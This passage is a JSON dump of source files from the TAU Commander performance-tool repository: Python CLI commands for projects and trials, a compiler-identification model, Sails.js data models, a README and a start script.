"gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\n\n# TAU modules\nimport logger\nimport arguments as args\nimport commands\nimport controller\nfrom model.project import Project\nfrom model.target import Target\nfrom model.application import Application\nfrom model.measurement import Measurement\n\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Create a new project configuration.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s <project_name> [targets] [applications] [measurements] [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nPARSER = args.getParserFromModel(Project,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\nPARSER.add_argument('impl_targets', \n help=\"Target configurations in this project\",\n metavar='[targets]', \n nargs='*',\n default=args.SUPPRESS)\nPARSER.add_argument('impl_applications', \n help=\"Application configurations in this project\",\n metavar='[applications]', \n nargs='*', \n default=args.SUPPRESS)\nPARSER.add_argument('impl_measurements', \n help=\"Measurement configurations in this project\",\n metavar='[measurements]',\n nargs='*',\n default=args.SUPPRESS) \nPARSER.add_argument('--targets',\n help=\"Target configurations in this project\",\n metavar='t',\n nargs='+',\n default=args.SUPPRESS)\nPARSER.add_argument('--applications', \n help=\"Application configurations in this project\",\n metavar='a',\n nargs='+',\n default=args.SUPPRESS)\nPARSER.add_argument('--measurements', \n help=\"Measurement configurations in this project\",\n metavar='m',\n nargs='+',\n default=args.SUPPRESS)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n targets = set()\n applications = set()\n measurements = set()\n \n for attr, model, dest in [('targets', Target, targets), \n ('applications', Application, applications), \n ('measurements', Measurement, measurements)]:\n for name in getattr(args, attr, []):\n found = model.withName(name)\n if not found:\n PARSER.error('There is no %s named %r' % (model.model_name, name))\n dest.add(found.eid)\n \n for name in getattr(args, 'impl_'+attr, []):\n t = Target.withName(name)\n a = Application.withName(name)\n m = Measurement.withName(name)\n tam = set([t,a,m]) - set([None])\n if len(tam) > 1:\n PARSER.error('%r is ambiguous, please use --targets, --applications,'\n ' or --measurements to specify configuration type' % name)\n elif len(tam) == 0:\n PARSER.error('%r is not a target, application, or measurement' % name)\n elif t:\n targets.add(t.eid)\n elif a:\n applications.add(a.eid)\n elif m:\n measurements.add(m.eid)\n \n try:\n delattr(args, 'impl_'+attr)\n except AttributeError:\n pass\n \n args.targets = list(targets)\n args.applications = list(applications)\n args.measurements = list(measurements)\n \n try:\n Project.create(args.__dict__)\n except controller.UniqueAttributeError:\n PARSER.error(\"A project named '%s' already exists.\" % args.name)\n \n LOGGER.info('Created a new project named %r.' % args.name)\n return commands.executeCommand(['project', 'list'], [args.name])\n" }, { "alpha_fraction": 0.7338039875030518, "alphanum_fraction": 0.7383720874786377, "avg_line_length": 32.44444274902344, "blob_id": "541404bd04a19fc25b2dec6af0aa5e2f6c9cb4cc", "content_id": "aa8149020ab153fc5c38c4766f68efdf1bcf8e96", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2408, "license_type": "permissive", "max_line_length": 79, "num_lines": 72, "path": "/packages/tau/environment.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\n\ndef getEnv(name):\n \"\"\"\n Gets the value of the environment variable named 'name' or fails\n \"\"\"\n try:\n return os.environ[name]\n except KeyError:\n sys.stderr.write(\"\"\"\n%(bar)s\n!\n! CRITICAL ERROR: %(name)s environment variable not set.\n!\n%(bar)s\n \"\"\" % {'bar': '!'*80,\n 'name': name})\n sys.exit(EXIT_FAILURE)\n \ndef base():\n \"\"\"\n The starting point for all subprocess command line arguments and environment\n \"\"\"\n return [], dict(os.environ)\n\n# TAU Commander home path\n__TAU_HOME__ = getEnv('__TAU_HOME__')\n\n# User-level TAU files\nUSER_PREFIX = os.path.join(os.path.expanduser('~'), '.tau')\n\n# System-level TAU files\nSYSTEM_PREFIX = os.path.realpath(os.path.join(__TAU_HOME__, '.system'))\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5, "avg_line_length": 10.25, "blob_id": "941015b7c43b41487fe964a16a369da1e54b0cd1", "content_id": "6fb6f2c1a797c10f7c4b8d2896bbcdf8526adc82", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 46, "license_type": "permissive", "max_line_length": 15, "num_lines": 4, "path": "/README.md", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "TAU Commander\n=============\n\nComming soon...\n\n" }, { "alpha_fraction": 0.709956705570221, "alphanum_fraction": 0.7130488753318787, "avg_line_length": 32.6875, "blob_id": "fcebbef18132153c8f3be2e9b29ce87123c7037a", "content_id": "07222a8ff57d9c79c8df0ef4ff836f091030ee13", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3234, "license_type": "permissive", "max_line_length": 122, "num_lines": 96, "path": "/packages/tau/commands/trial/delete.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport logger\nimport commands\nimport error\nimport arguments as args\nfrom model.experiment import Experiment\nfrom model.trial import Trial\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Delete experiment trials.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s <trial_number> [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [ (('number',), {'help': \"Number of the trial to delete\",\n 'metavar': '<trial_number>'}) ]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE % {'command': COMMAND}, \n description=SHORT_DESCRIPTION)\n\ndef getUsage():\n return PARSER.format_help() \n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\"\n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n selection = Experiment.getSelected()\n if not selection:\n raise error.ConfigurationError(\"No experiment configured.\", \"See `tau project select`\")\n\n try: \n number = int(args.number)\n except ValueError:\n PARSER.error(\"Invalid trial number: %s\" % args.number)\n fields = {'experiment': selection.eid, 'number': number}\n if not Trial.exists(fields):\n PARSER.error(\"No trial number %s in the current experiment. See `tau trial list` to see all trial numbers.\" % number)\n Trial.delete(fields)\n LOGGER.info('Deleted trial %s' % number)\n \n return commands.executeCommand(['trial', 'list'], [])\n" }, { "alpha_fraction": 0.5243342518806458, "alphanum_fraction": 0.5243342518806458, "avg_line_length": 14.768115997314453, "blob_id": "9844197de5b154a0aa8b48fd20614f17015f4c94", "content_id": "87af5b76989a8376f52f94f4d83380ab5a098fe9", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1089, "license_type": "permissive", "max_line_length": 108, "num_lines": 69, "path": "/commander/api/models/Measurement.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Measurement.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n\n attributes: {\n\n // One-to-many association\n user: {\n model: 'User', \n required: true \n },\n\n // Projects this measurement belongs to\n projects: {\n collection: 'Project',\n via: 'measurements'\n },\n\n // Target name\n name: {\n type: 'string',\n required: true\n },\n\n profile: {\n type: 'boolean',\n defaultsTo: true\n },\n\n trace: {\n type: 'boolean',\n defaultsTo: false\n },\n\n source_inst: {\n type: 'boolean',\n defaultsTo: true\n },\n\n // One of: [always, never, fallback]\n comp_inst: {\n type: 'string',\n defaultsTo: 'fallback'\n },\n\n sampling: {\n type: 'boolean',\n defaultsTo: false\n },\n\n io: {\n type: 'boolean',\n defaultsTo: false\n },\n\n memory: {\n type: 'boolean',\n defaultsTo: false\n }\n\n }\n};\n\n" }, { "alpha_fraction": 0.6121212244033813, "alphanum_fraction": 0.6181818246841431, "avg_line_length": 22.428571701049805, "blob_id": "bf790218c7ef51559a8815d256674eb5eb5ad33e", "content_id": "114acd26222f0cafe5af3394d8cd83195bb1e5b8", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 165, "license_type": "permissive", "max_line_length": 54, "num_lines": 7, "path": "/commander/bin/start.sh", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "#!/bin/bash\nHERE=$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\n\nexport NODE_ENV=\"production\"\n\nexport PATH=$HERE/../node_modules/.bin:$PATH\nsails lift --prod $@\n\n" }, { "alpha_fraction": 0.6902157664299011, "alphanum_fraction": 0.6931717395782471, "avg_line_length": 28.929203033447266, "blob_id": "b29ad399e262a0b117065924d97e39774a3c5736", "content_id": "c27bf605da3049a0483251a33144e00c8ec00839", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3383, "license_type": "permissive", "max_line_length": 90, "num_lines": 113, "path": "/packages/tau/commands/trial/show.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU modules\nimport tau\nimport logger\nimport commands\nimport error\nimport util\nimport arguments as args\nimport environment as env\nfrom model.experiment import Experiment\nfrom model.trial import Trial\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Display trial data in analysis tool.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s [trial_number] [trial_number] ... [arguments]\n %(command)s -h | --help\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\n_arguments = [(('numbers',), {'help': \"If given, show details for trial with this number\",\n 'metavar': 'trial_number', \n 'nargs': '*',\n 'default': args.SUPPRESS})]\nPARSER = args.getParser(_arguments,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n selection = Experiment.getSelected()\n if not selection:\n LOGGER.info(\"No experiment configured. See `tau project select`\\n\")\n return tau.EXIT_FAILURE\n \n \n try:\n str_numbers = args.numbers\n except AttributeError:\n numbers = None\n else:\n numbers = []\n for n in str_numbers:\n try:\n numbers.append(int(n))\n except ValueError:\n PARSER.error(\"Invalid trial number: %s\" % n)\n\n return selection.show(numbers)\n\n" }, { "alpha_fraction": 0.6193143129348755, "alphanum_fraction": 0.6273733377456665, "avg_line_length": 31.8295955657959, "blob_id": "fc6d23ae59d68b94b1fb64c4d39134b8f31ccf3c", "content_id": "79a0525d4aaed4bb3c22e85f9a07a7a9dc24757e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7321, "license_type": "permissive", "max_line_length": 119, "num_lines": 223, "path": "/packages/tau/model/compiler.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n# System modules\nimport os\nimport hashlib\n\n# TAU modules\nimport logger\nimport settings\nimport error\nimport controller\nimport util\nimport cf.tau\nfrom model.project import Project\nfrom model.target import Target\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass CompilerInfo(object):\n \"\"\"\n Information about a compiler command\n \"\"\"\n def __init__(self, cmd, role, family, language):\n self.command = cmd\n self.role = role\n self.family = family\n self.language = language\n self.tau_wrapper = cf.tau.COMPILER_WRAPPERS[role]\n self.short_descr = \"%s %s compiler.\" % (family, language)\n def __repr__(self):\n return repr(self.__dict__)\n\nKNOWN_COMPILERS = {\n 'cc': CompilerInfo('cc', 'CC', 'system', 'C'),\n 'c++': CompilerInfo('c++', 'CXX', 'system', 'C++'),\n 'f77': CompilerInfo('f77', 'FC', 'system', 'FORTRAN77'),\n 'f90': CompilerInfo('f90', 'FC', 'system', 'Fortran90'),\n 'ftn': CompilerInfo('ftn', 'FC', 'system', 'Fortran90'),\n 'gcc': CompilerInfo('gcc', 'CC', 'GNU', 'C'),\n 'g++': CompilerInfo('g++', 'CXX', 'GNU', 'C++'),\n 'gfortran': CompilerInfo('gfortran', 'FC', 'GNU', 'Fortran90'),\n 'icc': CompilerInfo('icc', 'CC', 'Intel', 'C'),\n 'icpc': CompilerInfo('icpc', 'CXX', 'Intel', 'C++'),\n 'ifort': CompilerInfo('ifort', 'FC', 'Intel', 'Fortran90'),\n 'pgcc': CompilerInfo('pgcc', 'CC', 'PGI', 'C'),\n 'pgCC': CompilerInfo('pgCC', 'CXX', 'PGI', 'C++'),\n 'pgf77': CompilerInfo('pgf77', 'FC', 'PGI', 'FORTRAN77'),\n 'pgf90': CompilerInfo('pgf90', 'FC', 'PGI', 'Fortran90'),\n 'mpicc': CompilerInfo('mpicc', 'CC', 'MPI', 'C'),\n 'mpicxx': CompilerInfo('mpicxx', 'CXX', 'MPI', 'C++'),\n 'mpic++': CompilerInfo('mpic++', 'CXX', 'MPI', 'C++'),\n 'mpiCC': CompilerInfo('mpiCC', 'CXX', 'MPI', 'C++'),\n 'mpif77': CompilerInfo('mpif77', 'FC', 'MPI', 'FORTRAN77'),\n 'mpif90': CompilerInfo('mpif90', 'FC', 'MPI', 'Fortran90')\n }\n\nKNOWN_FAMILIES = {}\nfor comp in KNOWN_COMPILERS.itervalues():\n family = comp.family\n KNOWN_FAMILIES.setdefault(family, [])\n KNOWN_FAMILIES[family].append(comp)\ndel comp\n\nclass Compiler(controller.Controller):\n \"\"\"\n Compiler data model controller\n \"\"\"\n \n attributes = {\n 'command': {\n 'type': 'string',\n 'required': True,\n },\n 'path': {\n 'type': 'string',\n 'required': True,\n },\n 'md5': {\n 'type': 'string',\n 'required': True,\n },\n 'version': {\n 'type': 'string',\n 'required': True\n },\n 'role': {\n 'type': 'string',\n 'required': True\n },\n 'family': {\n 'type': 'string',\n 'required': True\n },\n 'language': {\n 'type': 'string',\n 'required': True\n },\n 'tau_wrapper': {\n 'type': 'string',\n 'required': True\n }\n }\n \n def __str__(self):\n return self['command']\n \n def absolutePath(self):\n return os.path.join(self['path'], self['command'])\n\n @classmethod\n def identify(cls, compiler_cmd):\n \"\"\"\n Identifies a compiler executable from `compiler_cmd`\n \"\"\"\n LOGGER.debug(\"Identifying compiler: %s\" % compiler_cmd)\n command = os.path.basename(compiler_cmd)\n path = util.which(compiler_cmd)\n try:\n info = KNOWN_COMPILERS[command]\n except KeyError:\n raise error.ConfigurationError(\"Unknown compiler command: '%s'\", compiler_cmd)\n if not path:\n raise error.ConfigurationError(\"%s %s compiler '%s' missing or not executable.\" % \n (info.family, info.language, compiler_cmd), \n \"Check spelling, loaded modules, PATH environment variable, and file permissions\")\n if not util.file_accessible(path):\n raise error.ConfigurationError(\"Compiler '%s' not readable.\" % (os.path.join(path, command)))\n\n md5sum = hashlib.md5()\n with open(path, 'r') as compiler_file:\n md5sum.update(compiler_file.read())\n md5 = md5sum.hexdigest()\n\n # TODO: Compiler version\n version = 'FIXME'\n \n fields = {'command': command,\n 'path': path,\n 'md5': md5,\n 'version': version,\n 'role': info.role,\n 'family': info.family,\n 'language': info.language,\n 'tau_wrapper': info.tau_wrapper}\n \n found = cls.one(keys=fields)\n if found:\n LOGGER.debug(\"Found compiler record: %s\" % found)\n else:\n LOGGER.debug(\"No compiler record found. Creating new record: %s\" % fields)\n found = cls.create(fields)\n return found\n\n @classmethod\n def getSiblings(cls, compiler):\n \"\"\"\n TODO: Docs\n \"\"\"\n LOGGER.debug(\"Getting compilers for '%s'\" % compiler)\n\n compilers = {compiler['role']: compiler}\n for known in KNOWN_COMPILERS.itervalues():\n LOGGER.debug(\"Checking %s\" % known)\n if (known.family == compiler['family']) and (known.role != compiler['role']):\n try:\n other = cls.identify(known.command)\n except error.ConfigurationError, e:\n LOGGER.debug(e)\n continue\n if os.path.dirname(other['path']) == os.path.dirname(compiler['path']):\n LOGGER.debug(\"Found %s compiler '%s' matching '%s'\" % (other['role'], other['command'], compiler['command']))\n compilers[other['role']] = other\n\n try:\n cc = compilers['CC']\n except KeyError:\n raise error.ConfigurationError(\"Cannot find C compiler for %s\" % compiler)\n try:\n cxx = compilers['CXX']\n except KeyError:\n raise error.ConfigurationError(\"Cannot find C++ compiler for %s\" % compiler)\n try:\n fc = compilers['FC']\n except KeyError:\n raise error.ConfigurationError(\"Cannot find Fortran compiler for %s\" % compiler)\n\n return cc, cxx, fc\n" }, { "alpha_fraction": 0.5036231875419617, "alphanum_fraction": 0.5036231875419617, "avg_line_length": 13.706666946411133, "blob_id": "1a1d62421021178b1bce3fb55c1bee2f1a3b0b49", "content_id": "36f43df156df68af0bbd3cd6dd05c96f335c27e3", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1104, "license_type": "permissive", "max_line_length": 108, "num_lines": 75, "path": "/commander/api/models/Application.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Application.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n\n attributes: {\n\n // One-to-many association\n user: {\n model: 'User', \n required: true \n },\n\n // Projects this application belongs to\n projects: {\n collection: 'Project',\n via: 'applications'\n },\n\n // Application name\n name: {\n type: 'string',\n required: true\n },\n\n version: {\n type: 'string',\n },\n\n source: {\n type: 'binary',\n },\n\n repo: {\n type: 'string',\n },\n\n openmp: {\n type: 'boolean',\n defaultsTo: false\n },\n\n pthreads: {\n type: 'boolean',\n defaultsTo: false\n },\n\n mpi: {\n type: 'boolean',\n defaultsTo: false\n },\n\n cuda: {\n type: 'boolean',\n defaultsTo: false\n },\n\n shmem: {\n type: 'boolean',\n defaultsTo: false\n },\n \n mpc: {\n type: 'boolean',\n defaultsTo: false\n }\n\n }\n};\n\n" }, { "alpha_fraction": 0.6184027194976807, "alphanum_fraction": 0.6203943490982056, "avg_line_length": 34.11188888549805, "blob_id": "de0b48baa1f91ccd4b9016baff6c9a808c515c72", "content_id": "523424ecde3ad7690656b1de6f37e2f7e50fd355", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5021, "license_type": "permissive", "max_line_length": 96, "num_lines": 143, "path": "/packages/tau/commands/measurement/list.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nfrom texttable import Texttable\nfrom pprint import pformat\n\n# TAU 